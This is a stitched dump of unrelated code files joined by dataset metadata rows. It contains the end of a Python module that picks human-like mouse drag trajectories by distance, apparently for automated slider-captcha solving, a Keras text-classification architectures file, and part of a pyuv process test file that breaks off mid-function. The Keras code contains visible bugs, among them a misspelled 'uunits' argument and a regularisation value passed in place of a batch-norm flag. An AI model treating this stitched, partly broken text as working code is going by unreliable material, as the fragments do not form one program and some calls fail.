'{-25,-20,0};{0,0,0};{-1,0,63};{-1,-1,79};{-1,-3,95};{0,-3,103};{0,-3,106};{0,-3,107};{0,-3,107};{0,-3,107};{0,-3,108};{0,-3,108};{0,-3,109};{0,-3,109};{0,-3,109};{1,-3,110};{2,-3,119};{5,-3,127};{8,-3,135};{9,-4,143};{12,-4,151};{15,-4,159};{19,-4,167};{23,-4,175};{28,-4,183};{33,-4,191};{37,-4,199};{42,-4,207};{49,-4,215};{57,-4,223};{62,-4,231};{71,-4,241};{77,-4,248};{77,-4,249};{77,-4,249};{77,-4,249};{86,-4,256};{91,-4,263};{95,-4,272};{100,-4,279};{103,-4,289};{107,-4,295};{111,-4,303};{115,-4,311};{118,-4,319};{120,-4,327};{124,-4,335};{127,-4,343};{128,-4,351};{130,-4,359};{132,-4,367};{134,-4,375};{137,-4,383};{139,-4,391};{140,-4,399};{141,-4,407};{142,-4,423};{143,-4,431};{144,-4,447};{145,-4,455};{146,-4,463};{148,-4,471};{150,-4,487};{151,-4,495};{154,-4,503};{157,-4,512};{158,-4,519};{160,-4,527};{162,-4,535};{164,-4,543};{165,-4,551};{166,-4,559};{167,-4,567};{168,-4,575};{169,-4,591};{170,-4,607};{171,-4,623};{172,-4,640};{174,-4,647};{175,-4,663};{176,-4,671};{177,-4,687};{178,-4,759};{179,-4,767};{180,-4,783};{181,-4,847};{182,-4,863};{183,-4,871};{184,-4,975};{185,-4,991};{186,-4,1056};{187,-4,1074};{188,-4,1079};{189,-4,1096};{189,-4,1463};',
'{-23,-18,0};{0,0,0};{0,0,0};{0,1,285};{1,1,293};{3,1,309};{5,1,317};{8,1,325};{11,1,336};{14,1,341};{15,1,351};{17,1,357};{19,1,366};{21,1,373};{22,1,382};{24,1,389};{26,1,398};{29,1,405};{32,1,414};{33,1,421};{36,1,429};{39,1,437};{40,1,445};{43,1,453};{44,1,461};{46,1,469};{47,1,477};{50,1,486};{51,1,501};{54,1,509};{55,1,518};{57,1,525};{58,1,534};{61,2,541};{62,2,550};{64,2,557};{66,2,566};{68,2,573};{69,2,589};{70,2,597};{72,2,605};{73,2,621};{74,2,630};{75,2,637};{76,2,653};{77,2,662};{78,2,669};{79,2,686};{80,2,695};{81,2,701};{82,2,717};{84,2,725};{86,2,741};{87,2,749};{88,2,765};{89,2,781};{91,2,814};{92,2,821};{93,2,829};{94,2,837};{96,2,845};{97,2,853};{99,2,862};{100,2,869};{101,2,878};{102,2,886};{103,2,901};{104,2,909};{105,2,917};{107,2,943};{108,2,949};{109,2,957};{110,2,965};{111,2,973};{112,2,981};{115,2,990};{116,2,1007};{118,2,1014};{120,2,1029};{121,2,1039};{123,2,1054};{124,2,1061};{125,2,1070};{126,2,1086};{128,2,1094};{130,2,1109};{132,1,1117};{134,1,1150};{135,1,1205};{137,1,1229};{138,1,1253};{139,1,1285};{140,1,1325};{140,1,1598};',
'{-11,-25,0};{0,0,0};{0,0,5};{3,1,229};{6,1,237};{8,1,245};{10,2,253};{11,2,262};{12,2,269};{13,2,278};{14,2,293};{16,2,333};{17,2,342};{18,2,373};{19,2,381};{20,2,389};{21,2,397};{22,2,406};{23,2,413};{24,2,421};{26,2,429};{27,2,437};{29,2,453};{30,2,477};{32,2,485};{33,2,493};{34,2,501};{35,2,509};{36,2,517};{38,2,525};{39,2,541};{40,2,558};{41,2,573};{42,2,581};{43,2,589};{45,2,597};{46,2,605};{48,2,613};{49,2,621};{52,2,629};{53,2,637};{56,2,645};{57,2,654};{59,2,661};{62,2,669};{67,2,677};{70,2,685};{73,2,693};{76,2,701};{78,2,709};{79,2,717};{81,2,725};{83,2,733};{85,2,749};{86,2,765};{88,2,773};{89,2,781};{90,2,789};{91,2,797};{92,2,813};{93,2,821};{94,2,829};{96,2,845};{96,3,854};{97,3,861};{98,3,877};{99,3,893};{100,3,902};{101,3,958};{102,3,1017};{103,3,1038};{104,3,1181};{105,3,1205};{107,4,1248};{108,4,1365};{109,4,1381};{110,4,1638};{110,4,1825};',
'{-16,-23,0};{0,0,0};{1,0,232};{5,0,240};{7,0,248};{9,0,255};{10,0,264};{12,0,272};{14,1,280};{15,1,288};{17,1,296};{18,1,304};{19,2,320};{21,2,328};{22,2,336};{24,3,345};{26,3,352};{29,3,360};{32,3,368};{34,3,376};{37,3,384};{40,3,393};{45,5,400};{49,5,408};{55,6,416};{63,6,423};{67,6,432};{73,6,440};{78,6,448};{82,6,456};{85,6,464};{88,6,472};{89,6,488};{92,6,495};{96,6,504};{99,6,512};{100,6,528};{102,6,600};{103,6,624};{106,6,632};{110,7,642};{114,7,648};{118,7,658};{122,7,664};{128,7,674};{135,7,680};{142,7,689};{146,7,696};{150,7,705};{153,7,712};{155,7,720};{158,7,727};{161,7,736};{164,7,744};{166,7,752};{168,7,759};{169,7,768};{172,7,775};{174,7,784};{176,7,792};{177,7,895};{176,7,1104};{173,7,1118};{171,7,1131};{170,7,1149};{169,7,1641};{168,7,1657};{167,7,1704};{167,7,2144};',
'{-10,-20,0};{0,0,0};{1,0,164};{2,0,212};{3,0,228};{4,0,244};{5,0,270};{6,0,277};{7,0,292};{8,0,309};{9,0,318};{10,0,324};{11,0,340};{12,0,356};{13,0,365};{14,0,388};{15,0,396};{16,0,404};{17,0,420};{18,0,429};{19,0,436};{20,0,468};{21,0,492};{22,0,524};{24,0,534};{25,0,550};{26,0,566};{27,0,572};{28,0,583};{30,0,597};{31,0,613};{33,0,630};{35,0,636};{36,0,646};{37,0,652};{39,0,661};{41,0,668};{43,0,677};{44,0,684};{45,0,692};{47,0,701};{48,0,716};{50,0,726};{51,0,748};{52,1,764};{53,1,780};{54,1,812};{55,1,820};{56,1,828};{57,1,845};{58,1,852};{59,1,861};{60,1,878};{61,1,884};{62,1,893};{63,1,900};{64,1,908};{65,1,916};{66,1,932};{68,1,941};{69,1,948};{70,2,964};{71,2,972};{72,2,980};{74,2,988};{75,2,1004};{77,2,1021};{78,2,1037};{80,2,1052};{80,3,1060};{81,3,1076};{83,3,1141};{84,3,1334};{86,3,1356};{87,3,1437};{87,2,1542};{86,2,1566};{84,1,1572};{83,1,1588};{81,1,1605};{80,1,1621};{79,1,1636};{78,1,1644};{77,1,1669};{76,0,1700};{76,0,2158};',
'{-27,-20,0};{0,0,0};{1,0,175};{2,0,183};{5,0,191};{6,0,200};{8,0,215};{9,0,225};{10,0,232};{11,0,240};{12,0,263};{13,0,273};{15,0,279};{17,0,295};{18,0,304};{21,0,312};{22,0,320};{24,0,328};{26,0,336};{28,0,343};{30,0,352};{33,0,359};{36,0,369};{39,0,375};{41,0,383};{44,0,391};{47,0,399};{49,0,407};{52,0,415};{54,0,423};{55,0,431};{58,0,439};{60,0,447};{63,0,456};{66,0,464};{69,0,471};{70,0,479};{73,0,487};{74,0,495};{76,0,504};{77,0,523};{79,0,527};{81,0,543};{84,0,553};{85,0,559};{86,0,570};{87,0,576};{89,0,589};{90,0,593};{92,0,601};{93,0,608};{95,0,624};{97,0,633};{99,1,640};{100,1,648};{101,1,656};{103,1,666};{104,2,672};{106,2,688};{107,2,696};{108,2,704};{109,2,713};{110,2,728};{111,2,736};{113,2,744};{114,2,760};{116,2,771};{117,2,776};{118,2,784};{120,3,792};{120,4,802};{121,4,816};{122,4,824};{123,4,834};{125,4,840};{126,4,856};{128,4,866};{129,4,880};{131,4,904};{132,4,936};{133,4,944};{134,4,960};{135,4,976};{136,4,984};{137,4,992};{139,4,1008};{140,4,1016};{141,4,1024};{142,4,1032};{143,4,1040};{144,4,1048};{145,4,1064};{146,4,1072};{147,4,1080};{148,4,1113};{149,4,1121};{150,4,1152};{151,4,1688};{152,4,1818};{152,4,2331};'
]
# return source_track
# linux 和widow不同 # 从dos转为Unix
# original = "t_dict_unix.pkl"
# destination = "t_dict.pkl"
#
# content = ''
# outsize = 0
# with open(original, 'rb') as infile:
# content = infile.read()
# with open(destination, 'wb') as output:
# for line in content.splitlines():
# outsize += len(line) + 1
# output.write(line + str.encode('\n'))
t_dict = pickle.load(open('t_dict_unix.pkl', 'rb'))
if str(dist) in t_dict:
print('in file %s' % dist)
return t_dict[str(dist)], 1
if str(dist - 1) in t_dict:
print('in file %s-1' % (dist))
return t_dict[str(dist - 1)], 1
if str(dist + 1) in t_dict:
print('in file %s+1' % (dist))
return t_dict[str(dist + 1)], 1
if str(dist - 2) in t_dict:
print('in file %s-2' % (dist))
return t_dict[str(dist - 2)], 1
if str(dist + 2) in t_dict:
print('in file %s+2' % (dist))
return t_dict[str(dist + 2)], 1
# 先前没有保存t_dict.pkl的时候 使用了source_track中的值
# 若t_dick收集的完善,将不会执行到这一步,可将一下代码注释
# 若某个小概率距离t_dick中未出现,则从source_track的轨迹中截取
s = '{%d,' % dist
print(s)
tmp_track_list = []
for item in source_track[:]:
if s in item:
tmp_track_list.append(item)
if len(tmp_track_list) > 0:
return random.sample(tmp_track_list, 1)[0], 0
else:
return source_track[0], 0
def choice_track(dist):
track, tag = choice_track_list(dist) # 来自训练路径 tag=1
# 规范化轨迹数据 [[x,y,t],...]
track_list = format_track(track) # 路径列表
# 若tag==0,即轨迹数据不在已收集的轨迹文件中(来自候选轨迹列表),
# 则截取路径(从中截取需要的长度)
if tag != 1:
# 采用垃圾算法获取轨迹 建议重写
new_track_list = get_trace_fast(dist)
else:
# tag==1 轨迹数据来自文件 直接赋值
new_track_list = track_list
return new_track_list
if __name__ == '__main__':
print(choice_track(76))
| 104.047244
| 2,695
| 0.556153
| 2,918
| 13,214
| 2.493831
| 0.306374
| 0.010994
| 0.011131
| 0.009345
| 0.072832
| 0.060052
| 0.052219
| 0.03889
| 0.02982
| 0.02982
| 0
| 0.452731
| 0.08264
| 13,214
| 127
| 2,696
| 104.047244
| 0.147583
| 0.046315
| 0
| 0.043478
| 0
| 0.086957
| 0.772203
| 0.76465
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054348
| false
| 0.054348
| 0.032609
| 0
| 0.206522
| 0.076087
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
18eb3a79ba81205a75211cfada12a019cf85f9aa
| 19,907
|
py
|
Python
|
src/steps/keras/architectures.py
|
kant/open-solution-mapping-challenge
|
c3b2058b80edbeef0633939ed8e33f181b77a9c5
|
[
"MIT"
] | 200
|
2018-04-16T09:06:38.000Z
|
2020-01-19T04:04:56.000Z
|
src/steps/keras/architectures.py
|
kant/open-solution-mapping-challenge
|
c3b2058b80edbeef0633939ed8e33f181b77a9c5
|
[
"MIT"
] | 83
|
2018-04-22T21:50:22.000Z
|
2019-12-18T03:29:59.000Z
|
src/steps/keras/architectures.py
|
kant/open-solution-mapping-challenge
|
c3b2058b80edbeef0633939ed8e33f181b77a9c5
|
[
"MIT"
] | 56
|
2018-04-16T11:10:03.000Z
|
2020-01-17T20:10:33.000Z
|
from keras import regularizers
from keras.activations import relu
from keras.layers import Input, Embedding, PReLU, Bidirectional, Lambda, \
CuDNNLSTM, CuDNNGRU, Conv1D, Dense, BatchNormalization, Dropout, SpatialDropout1D, \
GlobalMaxPool1D, GlobalAveragePooling1D, MaxPooling1D
from keras.layers.merge import add, concatenate
from keras.models import Model
from .contrib import AttentionWeightedAverage
def scnn(embedding_matrix, embedding_size, trainable_embedding, maxlen, max_features,
filter_nr, kernel_size, repeat_block, dense_size, repeat_dense, output_size, output_activation,
max_pooling, mean_pooling, weighted_average_attention, concat_mode,
dropout_embedding, conv_dropout, dense_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2,
dense_kernel_reg_l2, dense_bias_reg_l2,
use_prelu, use_batch_norm, batch_norm_first):
input_text = Input(shape=(maxlen,))
x = Embedding(max_features, embedding_size, weights=[embedding_matrix], trainable=trainable_embedding)(
input_text)
x = dropout_block(dropout_embedding, dropout_mode)(x)
for _ in range(repeat_block):
x = convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, conv_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2, batch_norm_first)(x)
predictions = classification_block(dense_size=dense_size, repeat_dense=repeat_dense,
output_size=output_size, output_activation=output_activation,
max_pooling=max_pooling,
mean_pooling=mean_pooling,
weighted_average_attention=weighted_average_attention,
concat_mode=concat_mode,
dropout=dense_dropout,
kernel_reg_l2=dense_kernel_reg_l2, bias_reg_l2=dense_bias_reg_l2,
use_prelu=use_prelu, use_batch_norm=use_batch_norm,
batch_norm_first=batch_norm_first)(x)
model = Model(inputs=input_text, outputs=predictions)
return model
def dpcnn(embedding_matrix, embedding_size, trainable_embedding, maxlen, max_features,
filter_nr, kernel_size, repeat_block, dense_size, repeat_dense, output_size, output_activation,
max_pooling, mean_pooling, weighted_average_attention, concat_mode,
dropout_embedding, conv_dropout, dense_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2,
dense_kernel_reg_l2, dense_bias_reg_l2,
use_prelu, use_batch_norm, batch_norm_first):
"""
Note:
Implementation of http://ai.tencent.com/ailab/media/publications/ACL3-Brady.pdf
post activation is used instead of pre-activation, could be worth exploring
"""
input_text = Input(shape=(maxlen,))
if embedding_matrix is not None:
embedding = Embedding(max_features, embedding_size,
weights=[embedding_matrix], trainable=trainable_embedding)(input_text)
else:
embedding = Embedding(max_features, embedding_size)(input_text)
embedding = dropout_block(dropout_embedding, dropout_mode)(embedding)
x = convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, conv_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2, batch_norm_first)(embedding)
x = convolutional_block(filter_nr, kernel_size, conv_bias_reg_l2, use_prelu, conv_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2, batch_norm_first)(x)
if embedding_size == filter_nr:
x = add([embedding, x])
else:
embedding_resized = shape_matching_layer(filter_nr, use_prelu, conv_kernel_reg_l2, conv_bias_reg_l2)(embedding)
x = add([embedding_resized, x])
for _ in range(repeat_block):
x = dpcnn_block(filter_nr, kernel_size, use_batch_norm, use_prelu, conv_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2, batch_norm_first)(x)
predictions = classification_block(dense_size=dense_size, repeat_dense=repeat_dense,
output_size=output_size, output_activation=output_activation,
max_pooling=max_pooling,
mean_pooling=mean_pooling,
weighted_average_attention=weighted_average_attention,
concat_mode=concat_mode,
dropout=dense_dropout,
kernel_reg_l2=dense_kernel_reg_l2, bias_reg_l2=dense_bias_reg_l2,
use_prelu=use_prelu, use_batch_norm=use_batch_norm,
batch_norm_first=batch_norm_first)(x)
model = Model(inputs=input_text, outputs=predictions)
return model
def cudnn_lstm(embedding_matrix, embedding_size, trainable_embedding,
maxlen, max_features,
unit_nr, repeat_block,
dense_size, repeat_dense, output_size, output_activation,
max_pooling, mean_pooling, weighted_average_attention, concat_mode,
dropout_embedding, rnn_dropout, dense_dropout, dropout_mode,
rnn_kernel_reg_l2, rnn_recurrent_reg_l2, rnn_bias_reg_l2,
dense_kernel_reg_l2, dense_bias_reg_l2,
use_prelu, use_batch_norm, batch_norm_first):
input_text = Input(shape=(maxlen,))
if embedding_matrix is not None:
x = Embedding(max_features,
embedding_size,
weights=[embedding_matrix],
trainable=trainable_embedding)(input_text)
else:
x = Embedding(max_features,
embedding_size)(input_text)
x = dropout_block(dropout_embedding, dropout_mode)(x)
for _ in range(repeat_block):
x = cudnn_lstm_block(unit_nr=unit_nr, return_sequences=True, bidirectional=True,
kernel_reg_l2=rnn_kernel_reg_l2,
recurrent_reg_l2=rnn_recurrent_reg_l2,
bias_reg_l2=rnn_bias_reg_l2,
use_batch_norm=use_batch_norm, batch_norm_first=batch_norm_first,
dropout=rnn_dropout, dropout_mode=dropout_mode, use_prelu=use_prelu)(x)
predictions = classification_block(dense_size=dense_size, repeat_dense=repeat_dense,
output_size=output_size, output_activation=output_activation,
max_pooling=max_pooling,
mean_pooling=mean_pooling,
weighted_average_attention=weighted_average_attention,
concat_mode=concat_mode,
dropout=dense_dropout,
kernel_reg_l2=dense_kernel_reg_l2, bias_reg_l2=dense_bias_reg_l2,
use_prelu=use_prelu, use_batch_norm=use_batch_norm,
batch_norm_first=batch_norm_first)(x)
model = Model(inputs=input_text, outputs=predictions)
return model
def cudnn_gru(embedding_matrix, embedding_size, trainable_embedding,
maxlen, max_features,
unit_nr, repeat_block,
dense_size, repeat_dense, output_size, output_activation,
max_pooling, mean_pooling, weighted_average_attention, concat_mode,
dropout_embedding, rnn_dropout, dense_dropout, dropout_mode,
rnn_kernel_reg_l2, rnn_recurrent_reg_l2, rnn_bias_reg_l2,
dense_kernel_reg_l2, dense_bias_reg_l2,
use_prelu, use_batch_norm, batch_norm_first):
input_text = Input(shape=(maxlen,))
if embedding_matrix is not None:
x = Embedding(max_features,
embedding_size,
weights=[embedding_matrix],
trainable=trainable_embedding)(input_text)
else:
x = Embedding(max_features,
embedding_size)(input_text)
x = dropout_block(dropout_embedding, dropout_mode)(x)
for _ in range(repeat_block):
x = cudnn_gru_block(unit_nr=unit_nr, return_sequences=True, bidirectional=True,
kernel_reg_l2=rnn_kernel_reg_l2,
recurrent_reg_l2=rnn_recurrent_reg_l2,
bias_reg_l2=rnn_bias_reg_l2,
use_batch_norm=use_batch_norm, batch_norm_first=batch_norm_first,
dropout=rnn_dropout, dropout_mode=dropout_mode, use_prelu=use_prelu)(x)
predictions = classification_block(dense_size=dense_size, repeat_dense=repeat_dense,
output_size=output_size, output_activation=output_activation,
max_pooling=max_pooling,
mean_pooling=mean_pooling,
weighted_average_attention=weighted_average_attention,
concat_mode=concat_mode,
dropout=dense_dropout,
kernel_reg_l2=dense_kernel_reg_l2, bias_reg_l2=dense_bias_reg_l2,
use_prelu=use_prelu, use_batch_norm=use_batch_norm,
batch_norm_first=batch_norm_first)(x)
model = Model(inputs=input_text, outputs=predictions)
return model
def vdcnn(embedding_size, maxlen, max_features,
filter_nr, kernel_size, repeat_block, dense_size, repeat_dense, output_size, output_activation,
max_pooling, mean_pooling, weighted_average_attention, concat_mode,
dropout_embedding, conv_dropout, dense_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2,
dense_kernel_reg_l2, dense_bias_reg_l2,
use_prelu, use_batch_norm, batch_norm_first):
"""
Note:
Implementation of http://www.aclweb.org/anthology/E17-1104
We didn't use k-max pooling but GlobalMaxPool1D at the end and didn't explore it in the
intermediate layers.
"""
input_text = Input(shape=(maxlen,))
x = Embedding(input_dim=max_features, output_dim=embedding_size)(input_text)
x = dropout_block(dropout_embedding, dropout_mode)(x)
x = convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, conv_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2, batch_norm_first)(x)
for i in range(repeat_block):
if i + 1 != repeat_block:
x = vdcnn_block(filter_nr, kernel_size, use_batch_norm, use_prelu, conv_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2, batch_norm_first, last_block=False)(x)
else:
x = vdcnn_block(filter_nr, kernel_size, use_batch_norm, use_prelu, conv_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2, batch_norm_first, last_block=True)(x)
predictions = classification_block(dense_size=dense_size, repeat_dense=repeat_dense,
output_size=output_size, output_activation=output_activation,
max_pooling=max_pooling,
mean_pooling=mean_pooling,
weighted_average_attention=weighted_average_attention,
concat_mode=concat_mode,
dropout=dense_dropout,
kernel_reg_l2=dense_kernel_reg_l2, bias_reg_l2=dense_bias_reg_l2,
use_prelu=use_prelu, use_batch_norm=use_batch_norm,
batch_norm_first=batch_norm_first)(x)
model = Model(inputs=input_text, outputs=predictions)
return model
def classification_block(dense_size, repeat_dense, output_size, output_activation,
max_pooling, mean_pooling, weighted_average_attention, concat_mode,
dropout,
kernel_reg_l2, bias_reg_l2,
use_prelu, use_batch_norm, batch_norm_first):
def f(x):
if max_pooling:
x_max = GlobalMaxPool1D()(x)
else:
x_max = None
if mean_pooling:
x_mean = GlobalAveragePooling1D()(x)
else:
x_mean = None
if weighted_average_attention:
x_att = AttentionWeightedAverage()(x)
else:
x_att = None
x = [xi for xi in [x_max, x_mean, x_att] if xi is not None]
if len(x) == 1:
x = x[0]
else:
if concat_mode == 'concat':
x = concatenate(x, axis=-1)
else:
NotImplementedError('only mode concat for now')
for _ in range(repeat_dense):
x = dense_block(dense_size=dense_size,
use_batch_norm=use_batch_norm,
use_prelu=use_prelu,
dropout=dropout,
kernel_reg_l2=kernel_reg_l2,
bias_reg_l2=bias_reg_l2,
batch_norm_first=batch_norm_first)(x)
x = Dense(output_size, activation=output_activation)(x)
return x
return f
def dropout_block(dropout, dropout_mode):
def f(x):
if dropout_mode == 'spatial':
x = SpatialDropout1D(dropout)(x)
elif dropout_mode == 'simple':
x = Dropout(dropout)(x)
else:
raise NotImplementedError('spatial and simple modes are supported')
return x
return f
def prelu_block(use_prelu):
def f(x):
if use_prelu:
x = PReLU()(x)
else:
x = Lambda(relu)(x)
return x
return f
def bn_relu_dropout_block(use_batch_norm, use_prelu, dropout, dropout_mode, batch_norm_first):
def f(x):
if use_batch_norm and batch_norm_first:
x = BatchNormalization()(x)
x = prelu_block(use_prelu)(x)
x = dropout_block(dropout, dropout_mode)(x)
if use_batch_norm and not batch_norm_first:
x = BatchNormalization()(x)
return x
return f
def convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, dropout, dropout_mode,
kernel_reg_l2, bias_reg_l2, batch_norm_first):
def f(x):
x = Conv1D(filter_nr, kernel_size=kernel_size, padding='same', activation='linear',
kernel_regularizer=regularizers.l2(kernel_reg_l2),
bias_regularizer=regularizers.l2(bias_reg_l2))(x)
x = bn_relu_dropout_block(use_batch_norm=use_batch_norm,
batch_norm_first=batch_norm_first,
dropout=dropout,
dropout_mode=dropout_mode,
use_prelu=use_prelu)(x)
return x
return f
def shape_matching_layer(filter_nr, use_prelu, kernel_reg_l2, bias_reg_l2):
def f(x):
x = Conv1D(filter_nr, kernel_size=1, padding='same', activation='linear',
kernel_regularizer=regularizers.l2(kernel_reg_l2),
bias_regularizer=regularizers.l2(bias_reg_l2))(x)
x = prelu_block(use_prelu)(x)
return x
return f
def cudnn_lstm_block(unit_nr, return_sequences, bidirectional,
kernel_reg_l2, recurrent_reg_l2, bias_reg_l2,
use_batch_norm, batch_norm_first,
dropout, dropout_mode, use_prelu):
def f(x):
gru_layer = CuDNNLSTM(uunits=unit_nr, return_sequences=return_sequences,
kernel_regularizer=regularizers.l2(kernel_reg_l2),
recurrent_regularizer=regularizers.l2(recurrent_reg_l2),
bias_regularizer=regularizers.l2(bias_reg_l2)
)
if bidirectional:
x = Bidirectional(gru_layer)(x)
else:
x = gru_layer(x)
x = bn_relu_dropout_block(use_batch_norm=use_batch_norm, batch_norm_first=batch_norm_first,
dropout=dropout, dropout_mode=dropout_mode,
use_prelu=use_prelu)(x)
return x
return f
def cudnn_gru_block(unit_nr, return_sequences, bidirectional,
kernel_reg_l2, recurrent_reg_l2, bias_reg_l2,
use_batch_norm, batch_norm_first,
dropout, dropout_mode, use_prelu):
def f(x):
gru_layer = CuDNNGRU(units=unit_nr, return_sequences=return_sequences,
kernel_regularizer=regularizers.l2(kernel_reg_l2),
recurrent_regularizer=regularizers.l2(recurrent_reg_l2),
bias_regularizer=regularizers.l2(bias_reg_l2)
)
if bidirectional:
x = Bidirectional(gru_layer)(x)
else:
x = gru_layer(x)
x = bn_relu_dropout_block(use_batch_norm=use_batch_norm, batch_norm_first=batch_norm_first,
dropout=dropout, dropout_mode=dropout_mode,
use_prelu=use_prelu)(x)
return x
return f
def dense_block(dense_size, use_batch_norm, use_prelu, dropout, kernel_reg_l2, bias_reg_l2,
batch_norm_first):
def f(x):
x = Dense(dense_size, activation='linear',
kernel_regularizer=regularizers.l2(kernel_reg_l2),
bias_regularizer=regularizers.l2(bias_reg_l2))(x)
x = bn_relu_dropout_block(use_batch_norm=use_batch_norm,
use_prelu=use_prelu,
dropout=dropout,
dropout_mode='simple',
batch_norm_first=batch_norm_first)(x)
return x
return f
def dpcnn_block(filter_nr, kernel_size, use_batch_norm, use_prelu, dropout, dropout_mode,
kernel_reg_l2, bias_reg_l2, batch_norm_first):
def f(x):
x = MaxPooling1D(pool_size=3, strides=2)(x)
main = convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, dropout, dropout_mode,
kernel_reg_l2, bias_reg_l2, batch_norm_first)(x)
main = convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, dropout, dropout_mode,
kernel_reg_l2, bias_reg_l2, batch_norm_first)(main)
x = add([main, x])
return x
return f
def vdcnn_block(filter_nr, kernel_size, use_batch_norm, use_prelu, dropout, dropout_mode,
kernel_reg_l2, bias_reg_l2, batch_norm_first, last_block):
def f(x):
main = convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, dropout, dropout_mode,
kernel_reg_l2, bias_reg_l2, batch_norm_first)(x)
x = add([main, x])
main = convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, dropout, dropout_mode,
kernel_reg_l2, bias_reg_l2, batch_norm_first)(x)
x = add([main, x])
if not last_block:
x = MaxPooling1D(pool_size=3, strides=2)(x)
return x
return f
| 47.285036
| 119
| 0.608228
| 2,305
| 19,907
| 4.817787
| 0.070282
| 0.050878
| 0.042143
| 0.039172
| 0.868348
| 0.85493
| 0.828456
| 0.80027
| 0.779018
| 0.770914
| 0
| 0.011491
| 0.326769
| 19,907
| 420
| 120
| 47.397619
| 0.817117
| 0.017833
| 0
| 0.729412
| 0
| 0
| 0.005795
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079412
| false
| 0
| 0.017647
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
beca0766badad6c80c45f258af8d7476467f1664
| 11,206
|
py
|
Python
|
tests/test_process.py
|
benoitc/pyuv
|
51a2f8687e3b6cd54af5ce81aabfc00b7fe40a18
|
[
"MIT"
] | 1
|
2020-01-21T11:10:38.000Z
|
2020-01-21T11:10:38.000Z
|
tests/test_process.py
|
benoitc/pyuv
|
51a2f8687e3b6cd54af5ce81aabfc00b7fe40a18
|
[
"MIT"
] | null | null | null |
tests/test_process.py
|
benoitc/pyuv
|
51a2f8687e3b6cd54af5ce81aabfc00b7fe40a18
|
[
"MIT"
] | null | null | null |
import os
try:
import pwd
except ImportError:
pwd = None
import sys
from common import platform_skip, unittest2
import common
import pyuv
class ProcessTest(unittest2.TestCase):
def test_process_basic(self):
self.exit_cb_called = 0
self.close_cb_called = 0
def proc_close_cb(proc):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.assertEqual(exit_status, 0)
self.exit_cb_called += 1
proc.close(proc_close_cb)
loop = pyuv.Loop.default_loop()
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_basic.py"], exit_callback=proc_exit_cb)
else:
proc.spawn(file="./proc_basic.py", exit_callback=proc_exit_cb)
pid = proc.pid
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 1)
self.assertNotEqual(pid, None)
def test_process_cwd(self):
self.exit_cb_called = 0
self.close_cb_called = 0
def proc_close_cb(proc):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.assertEqual(exit_status, 0)
self.exit_cb_called += 1
proc.close(proc_close_cb)
loop = pyuv.Loop.default_loop()
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_basic.py"], exit_callback=proc_exit_cb, cwd=".")
else:
proc.spawn(file="./proc_basic.py", exit_callback=proc_exit_cb, cwd=".")
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 1)
def test_process_stdout(self):
self.exit_cb_called = 0
self.close_cb_called = 0
self.received_output = None
def handle_close_cb(handle):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.assertEqual(exit_status, 0)
self.exit_cb_called += 1
proc.close(handle_close_cb)
def stdout_read_cb(handle, data, error):
if data is not None:
self.received_output = data.strip()
handle.close(handle_close_cb)
loop = pyuv.Loop.default_loop()
stdout_pipe = pyuv.Pipe(loop)
stdio = []
stdio.append(pyuv.StdIO(flags=pyuv.UV_IGNORE))
stdio.append(pyuv.StdIO(stream=stdout_pipe, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_WRITABLE_PIPE))
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_stdout.py"], exit_callback=proc_exit_cb, stdio=stdio)
else:
proc.spawn(file="./proc_stdout.py", exit_callback=proc_exit_cb, stdio=stdio)
stdout_pipe.start_read(stdout_read_cb)
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 2)
self.assertEqual(self.received_output, b"TEST")
def test_process_args(self):
self.exit_cb_called = 0
self.close_cb_called = 0
self.received_output = None
def handle_close_cb(handle):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.assertEqual(exit_status, 0)
self.exit_cb_called += 1
proc.close(handle_close_cb)
def stdout_read_cb(handle, data, error):
self.received_output = data.strip()
handle.close(handle_close_cb)
loop = pyuv.Loop.default_loop()
stdout_pipe = pyuv.Pipe(loop)
